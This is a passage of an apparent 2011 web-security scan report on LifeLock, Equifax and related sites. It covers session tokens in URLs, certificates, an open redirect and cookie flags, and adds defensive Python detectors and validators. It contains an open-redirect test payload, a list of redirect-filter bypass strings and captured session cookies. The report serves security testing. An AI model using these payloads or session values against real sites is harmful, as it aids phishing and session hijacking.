Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: promoRefCode=NXDIRSUZIDPANN; expires=Tue, 24-May-2011 03:12:19 GMT; path=/; domain=.trustedid.com; secure
Set-Cookie: refCode=deleted; expires=Sat, 24-Apr-2010 03:12:18 GMT; path=/; domain=.trustedid.com; secure
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 12420

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Identity Theft Protection from Suze Orman</title>
<meta content=
...[SNIP]...

11. Session token in URL
There are 3 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
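The three instances below are found by the same mechanical check: a link or request URL that carries a session identifier either as a servlet-style path parameter (";jsessionid=...") or as a query parameter with a session-like name. The following Python is an added example of that check and is not part of the report or of any scanner's code; the name lists in the regexes are the example's own heuristic, and SAMPLE_HTML is a constructed fragment echoing the links quoted in 11.2 and 11.3 rather than a captured page.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Session identifiers carried as URL path parameters (";jsessionid=..." is the
# Java servlet URL-rewriting form seen in 11.2 and 11.3) or as query parameters
# whose name looks like a session/auth token (the "token=" form seen in 11.1).
# The name lists are a heuristic chosen for this example.
PATH_PARAM_RE = re.compile(r";(jsessionid|phpsessid|sessionid|sid)=([^;/?#\"'\s]+)", re.I)
QUERY_NAME_RE = re.compile(r"^(jsessionid|phpsessid|aspsessionid\w*|sessionid|session|sid|token|auth)$", re.I)
LINK_ATTR_RE = re.compile(r"""(?:href|src|action)\s*=\s*["']([^"']+)["']""", re.I)

# Constructed HTML fragment that echoes the links quoted in 11.2 and 11.3.
SAMPLE_HTML = """
<link href="../styles/login.css" rel="stylesheet" type="text/css" />
<a href="../portal/account-reset;jsessionid=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000"><i>Forgot</i></a>
<a href="../enrollment/;jsessionid=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000" name="linkWebstore">Enroll Now</a>
<a href="sitepage.ehtml;jsessionid=857e5247922609777fdaaf17d37b:ush2?forward=elearning_credit14">FCRA</a>
"""


def tokens_in_url(url):
    """Return [(where, name, value)] for session-like tokens found in one URL.

    urlsplit (unlike urlparse) keeps ";param" inside the path, so the servlet
    path parameter is still there to match.
    """
    found = []
    parts = urlsplit(url)
    for m in PATH_PARAM_RE.finditer(parts.path):
        found.append(("path", m.group(1), m.group(2)))
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if QUERY_NAME_RE.match(name) and value:
            found.append(("query", name, value))
    return found


def tokens_in_html(body):
    """Scan href/src/action attributes of a response body for token-bearing links."""
    found = []
    for url in LINK_ATTR_RE.findall(body):
        for where, name, value in tokens_in_url(url):
            found.append((url, where, name, value))
    return found


if __name__ == "__main__":
    # The request URL from 11.1 plus the constructed links from 11.2 and 11.3.
    for hit in tokens_in_url("http://bh.contextweb.com/bh/set.aspx?action=replace&advid=541&token=LIFL1"):
        print("request URL:", hit)
    for url, where, name, value in tokens_in_html(SAMPLE_HTML):
        print(f"response link: {where} parameter {name}={value} in {url}")
```

The name-based heuristic over-reports in the same way the scanner's "Firm" confidence does: the contextweb "token=LIFL1" value is a short campaign tag, not a session identifier, and only reading the application tells you which. The jsessionid hits are unambiguous and are fixed at the container rather than in the page: stop servlet URL rewriting so the session is carried only in the cookie.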


11.1. http://bh.contextweb.com/bh/set.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=replace&advid=541&token=LIFL1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|534889.z2r8aytrpwakd.0|535461.2931142961646634775.1; V=wOebwAz4UvVv; cwbh1=541%3B05%2F23%2F2011%3BLIFL1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web84
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Wed, 18-Apr-2012 03:08:32 GMT; Path=/
Set-Cookie: cwbh1=541%3B05%2F23%2F2011%3BLIFL1; Domain=.contextweb.com; Expires=Mon, 28-Mar-2016 03:08:32 GMT; Path=/
Content-Type: image/gif
Date: Sun, 24 Apr 2011 03:08:32 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

11.2. https://secure.lifelock.com/portal/login

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.lifelock.com
Path:   /portal/login

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /portal/login HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.1.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; 480-CT=3114#4/24/2011/2/56/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:09:21 GMT
Set-Cookie: JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; Path=/
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Content-Language: en-US
Expires: Sun, 24 Apr 2011 03:24:21 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=d566ab28e565142c668f1a3223da9d8931f2a75f23110e424db39461; Path=/
Vary: Accept-Encoding
Content-Length: 5371

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" >
<html>
   <head>
       <title>LifeLock Member Portal | Sign In</title>
       <link href="../styles/login.css" rel="stylesheet" type="text/css" med
...[SNIP]...
<br />
                   <a href="../portal/account-reset;jsessionid=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000"><i>
...[SNIP]...
<h3>Not a Member? <a href="../enrollment/;jsessionid=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000" name="linkWebstore">Enroll Now</a>
...[SNIP]...

11.3. https://www.econsumer.equifax.com/otc/landing.ehtml

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.econsumer.equifax.com
Path:   /otc/landing.ehtml

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /otc/landing.ehtml?%255estart=&companyName=cj_esnp3r&AID=10751987&PID=1911961&SID=gid9a%2bidentity%2btheft%2bresource_ordering34--2011-04-23--20-10-04CD1 HTTP/1.1
Host: www.econsumer.equifax.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 24 Apr 2011 03:12:19 GMT
Content-type: text/html;charset=ISO-8859-1
X-powered-by: Servlet/2.4 JSP/2.0
Set-cookie: JSESSIONID=857e5247922609777fdaaf17d37b; Path=/otc; Secure
Set-cookie: JROUTE=ush2; Path=/otc; Secure
Content-Length: 76392


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Equifax Per
...[SNIP]...
</a> &nbsp;|&nbsp;
       <a href="sitepage.ehtml;jsessionid=857e5247922609777fdaaf17d37b:ush2?forward=elearning_credit14">FCRA</a>
...[SNIP]...

12. SSL certificate
There are 5 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
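The background names three checks a client must make: the certificate is valid for the hostname, it chains to a trusted issuer, and the current date falls inside its validity period. The Python below is an added example of those three checks and is not code from the report or from any scanner; it works on the dict shape that ssl.SSLSocket.getpeercert() returns, the sample certificate is transcribed from the secure.lifelock.com entry in 12.2 (the report's CDT/CST times converted to GMT, and with no subjectAltName because the report lists only the CN), and TRUSTED_ISSUERS is a stand-in allow-list of issuer names rather than a real trust store.

```python
import ssl
from datetime import datetime, timezone

# Sample in the shape returned by ssl.SSLSocket.getpeercert(), transcribed from
# entry 12.2 of this report. CDT is UTC-5, so "Jul 11 19:00:00 CDT 2010" is
# "Jul 12 00:00:00 2010 GMT". No SAN is included because the report shows only the CN.
LIFELOCK_CERT = {
    "subject": ((("commonName", "secure.lifelock.com"),),),
    "issuer": ((("commonName", "VeriSign Class 3 Extended Validation SSL CA"),),),
    "notBefore": "Jul 12 00:00:00 2010 GMT",
    "notAfter": "Jul 25 23:59:59 2012 GMT",
}

# Stand-in for a trust store: issuer CNs that appear in this report's chains.
# A real client verifies signatures up to a trust anchor instead of matching names.
TRUSTED_ISSUERS = {
    "VeriSign Class 3 Extended Validation SSL CA",
    "VeriSign Class 3 Extended Validation SSL SGC CA",
    "Thawte SSL CA",
}


def _dns_names(cert):
    """Names the certificate claims: SAN DNS entries, else the subject CN."""
    names = [value for kind, value in cert.get("subjectAltName", ()) if kind == "DNS"]
    if not names:  # no SAN: fall back to the CN, as clients of this era did
        for rdn in cert.get("subject", ()):
            for key, value in rdn:
                if key == "commonName":
                    names.append(value)
    return names


def _issuer_cn(cert):
    for rdn in cert.get("issuer", ()):
        for key, value in rdn:
            if key == "commonName":
                return value
    return None


def hostname_matches(pattern, hostname):
    """RFC 6125 style match: '*' is allowed only as the entire leftmost label."""
    pattern, hostname = pattern.lower().rstrip("."), hostname.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == hostname
    p_labels, h_labels = pattern.split("."), hostname.split(".")
    if p_labels[0] != "*" or len(p_labels) != len(h_labels) or len(p_labels) < 3:
        return False  # "*.com" and "s*.example" are not acceptable wildcards
    return p_labels[1:] == h_labels[1:]


def check_certificate(cert, hostname, now=None, trusted_issuers=TRUSTED_ISSUERS):
    """Return the list of problems found; an empty list means all three checks passed."""
    now = datetime.now(timezone.utc).timestamp() if now is None else now
    problems = []
    if not any(hostname_matches(name, hostname) for name in _dns_names(cert)):
        problems.append("hostname mismatch")
    if _issuer_cn(cert) not in trusted_issuers:
        problems.append("issuer not trusted")
    not_before = ssl.cert_time_to_seconds(cert["notBefore"])
    not_after = ssl.cert_time_to_seconds(cert["notAfter"])
    if now < not_before:
        problems.append("not yet valid")
    elif now > not_after:
        problems.append("expired")
    return problems


if __name__ == "__main__":
    scan_time = ssl.cert_time_to_seconds("Apr 24 03:23:24 2011 GMT")  # report date
    print("at scan time:", check_certificate(LIFELOCK_CERT, "secure.lifelock.com", now=scan_time))
    print("today:", check_certificate(LIFELOCK_CERT, "secure.lifelock.com"))
```

Run today, the same certificate fails only the date check, which is the point of parameterising "now": an audit replayed against an old capture must be judged against the capture date. The issuer check here is deliberately the weakest of the three; matching a name in an allow-list says nothing about whether the issuer actually signed the certificate, and a real client leaves that to its TLS library (ssl.create_default_context() in Python).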



12.1. https://secure.identityguard.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificate:

Issued to:  secure.identityguard.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Wed Mar 02 18:00:00 CST 2011
Valid to:  Sat Mar 02 17:59:59 CST 2013

12.2. https://secure.lifelock.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.lifelock.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Sun Jul 11 19:00:00 CDT 2010
Valid to:  Wed Jul 25 18:59:59 CDT 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

12.3. https://www.econsumer.equifax.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.econsumer.equifax.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.econsumer.equifax.com
Issued by:  Thawte SSL CA
Valid from:  Mon Oct 25 19:00:00 CDT 2010
Valid to:  Sun Oct 30 18:59:59 CDT 2011

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  Thawte Premium Server CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

12.4. https://www.pcisecuritystandards.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pcisecuritystandards.org
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.pcisecuritystandards.org
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Thu Oct 22 19:00:00 CDT 2009
Valid to:  Sun Oct 23 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

12.5. https://www.trustedid.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.trustedid.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Sun Jan 17 18:00:00 CST 2010
Valid to:  Fri Feb 24 17:59:59 CST 2012

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13. Open redirection

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Issue detail

The value of the adurl request parameter is used to perform an HTTP redirect. The payload http%3a//a2e8cc29eb5c3fdf9/a%3fhttp%3a//clk.atdmt.com/go/253732016/direct%3bai.194941096%3bct.1/01 was submitted in the adurl parameter. This caused a redirection to the following URL:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:
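The finding below is the simplest form of the problem: the adurl parameter is copied into the Location header unchanged. The Python below is an added example contrasting that pattern with a redirect target validator of the kind the remediation describes; it is not code from the report or from the site in question. ALLOWED_HOSTS and BASE_URL are assumptions made for the example, and the parameter is assumed to arrive already URL-decoded, as a web framework would hand it over.

```python
from urllib.parse import urlsplit, urljoin

# Assumed for the example: the only origin this redirector may send users to.
ALLOWED_HOSTS = {"www.googleadservices.com"}
BASE_URL = "https://www.googleadservices.com/"


def vulnerable_redirect_target(adurl):
    """The pattern the finding describes: the parameter becomes the Location verbatim."""
    return adurl


def safe_redirect_target(adurl, allowed_hosts=ALLOWED_HOSTS, fallback="/"):
    """Return a Location value that can only point at an allowed host.

    Absolute URLs must name an allowed host; anything else is resolved against
    our own origin so the host is fixed by the server, not the parameter.
    """
    # Browsers accept backslashes and surrounding whitespace where urlsplit does
    # not, so normalise first: "https:\\evil" and " //evil" must not parse as relative.
    candidate = adurl.strip().replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return fallback                      # javascript:, data:, and friends
    if parts.netloc:
        # Compare the whole authority, so "allowed@evil" and odd ports are rejected too.
        if parts.netloc.lower() not in allowed_hosts:
            return fallback                  # absolute URL to a foreign host
        return candidate
    if candidate.startswith("//"):
        return fallback                      # protocol-relative URL, belt and braces
    resolved = urljoin(BASE_URL, candidate)  # relative path: pin it to our origin
    if urlsplit(resolved).netloc.lower() not in allowed_hosts:
        return fallback
    return resolved


if __name__ == "__main__":
    # The payload the scanner submitted in 13, decoded.
    payload = "http://a2e8cc29eb5c3fdf9/a?http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01"
    print("vulnerable ->", vulnerable_redirect_target(payload))
    print("hardened   ->", safe_redirect_target(payload))
    print("relative   ->", safe_redirect_target("/pagead/conversion/1033861443/"))
```

The normalisation step matters more than the allow-list: most open-redirect filter bypasses ("/\evil", "https:\\evil", "//evil", "allowed.example@evil") work because the filter and the browser parse the string differently, so the function canonicalises to what the browser will see before it decides. An ad click tracker like this one genuinely has to redirect to arbitrary advertiser domains, which is why the remediation's alternative of passing an index into a server-side list, rather than the URL itself, is the fit for that case.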

Request

GET /pagead/aclk?sa=L&ai=BKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE&num=1&client=ca-pub-6888065668292638&val=ChAyMmZiYTMwMDE2MDEwMDhkEJSfre0EGghI3SWftmaJ_yABKAE&sig=AGiWqtzICqiMDTo80UkKP6AzOKgkaHuSwA&adurl=http%3a//a2e8cc29eb5c3fdf9/a%3fhttp%3a//clk.atdmt.com/go/253732016/direct%3bai.194941096%3bct.1/01 HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_...[SNIP]...--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_...[SNIP]...--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Set-Cookie: Conversion=CtACQktrYnA1QmEwVGQzd0ZvejJsQWVieXJDd0NkZnEtTk1CbjZDVTdCaWZ4TzNVSEFBUUFSZ0JJQUE0QVZDQXgtSEVCR0RKN29PSThLUHNFb0lCRjJOaExYQjFZaTAyT0RnNE1EWTFOalk0TWpreU5qTTRvQUhEOHYzc0E3SUJGM0IxWWk1eVpYUmhhV3hsY2kxaGJXRjZiMjR1Ym1WMHVnRUtNVFl3ZURZd01GOWhjOGdCQ2RvQlNXaDBkSEE2THk5d2RXSXVjbVYwWVdsc1pYSXRZVzFoZW05dUxtNWxkQzlpWVc1dVpYSmZNVEl3WHpZd01GOWhMbkJvY0Q5elpXRnlZMmc5SlRkQ0pHdGxlWGR2Y21RbE4wU1lBdVFad0FJRXlBS0YwczhLcUFNQjZBTzhBZWdEbEFMMUF3QUFBTVNBQnVpM3pxckJqcktHMFFFEhMIk4a2vpW1qAIVBN7gCh2VGI4LGAEgq9z04ueQw4h2SAE; expires=Tue, 24-May-2011 12:36:41 GMT; path=/pagead/conversion/1033861443/
Cache-Control: private
Location: http://a2e8cc29eb5c3fdf9/a?http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 12:36:41 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block


14. Cookie without HttpOnly flag set
There are 88 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
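Sections 10 and 14 are two outputs of one check over Set-Cookie headers: is the Secure flag present on a cookie issued over HTTPS, is HttpOnly present, and does the cookie look like it carries a session token. The Python below is an added example of that audit together with the corresponding fix, and is not code from the report or from any scanner. The session-name regex is the example's own heuristic; the sample headers are copied from the responses quoted in 10.11, 10.12, 11.2 and 14.2.

```python
import re

# Cookie names that usually carry a session identifier (heuristic for this example).
SESSION_NAME_RE = re.compile(r"jsessionid|phpsessid|asp\.net_sessionid|aspsessionid|session|sid$|_sess", re.I)

# Set-Cookie values copied from responses in this report, with the scheme they were served over.
SAMPLES = [
    ("TS376161=3839eec1194f2196eff313388078a6965438784dc7b0156d4db397ac; Path=/", True),            # 10.11
    ("TIDT=173.193.214.243.1303614754152763; path=/; domain=.trustedid.com", True),                 # 10.12
    ("TSI=6rjj85kupb6n5r77pnlgtoq3g0; path=/; domain=www.trustedid.com; secure; HttpOnly", True),    # 10.12
    ("JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; Path=/", True),                     # 11.2
    ("PHPSESSID=g7dpq2uc614mccbr73j7na1id6; path=/", False),                                        # 14.2
]


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, {attribute: value-or-True}).

    Only the first '=' separates name from value, so values that themselves
    contain '=' (the securepaynet fb_session cookie in 14.4) survive intact.
    """
    pieces = [p.strip() for p in header_value.split(";")]
    name, _, value = pieces[0].partition("=")
    attrs = {}
    for piece in pieces[1:]:
        if not piece:
            continue
        key, _, val = piece.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value, attrs


def audit_cookies(set_cookie_headers, over_https):
    """One finding per cookie: the flags it lacks and whether it looks like a session token."""
    findings = []
    for header in set_cookie_headers:
        name, value, attrs = parse_set_cookie(header)
        missing = []
        if "httponly" not in attrs:
            missing.append("HttpOnly")
        if over_https and "secure" not in attrs:   # Secure is only meaningful on an HTTPS response
            missing.append("Secure")
        findings.append({
            "name": name,
            "missing": missing,
            "session_like": bool(SESSION_NAME_RE.search(name)) and value not in ("", "deleted"),
        })
    return findings


def harden_set_cookie(header_value, over_https=True):
    """The fix: the same header with whichever of HttpOnly and Secure was missing appended."""
    missing = audit_cookies([header_value], over_https)[0]["missing"]
    return header_value.rstrip("; ") + "".join("; " + flag for flag in missing)


if __name__ == "__main__":
    for header, https in SAMPLES:
        finding = audit_cookies([header], https)[0]
        tag = "session token" if finding["session_like"] else "other"
        print(f"{finding['name']:<12} {tag:<14} missing: {finding['missing'] or 'nothing'}")
```

The TSI cookie in 10.12 shows what a correct header looks like, and the JSESSIONID in 11.2 shows the case that matters: a session identifier on an HTTPS login page with neither flag, so it is exposed both to injected script and to any plain-HTTP request the browser makes to the same host. HttpOnly is still only a narrowing of impact: injected script cannot read the cookie, but it can drive the session from inside the victim's browser, which is the caveat the background paragraph ends on.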



14.1. http://ads.adxpose.com/ads/ads.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_289668 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
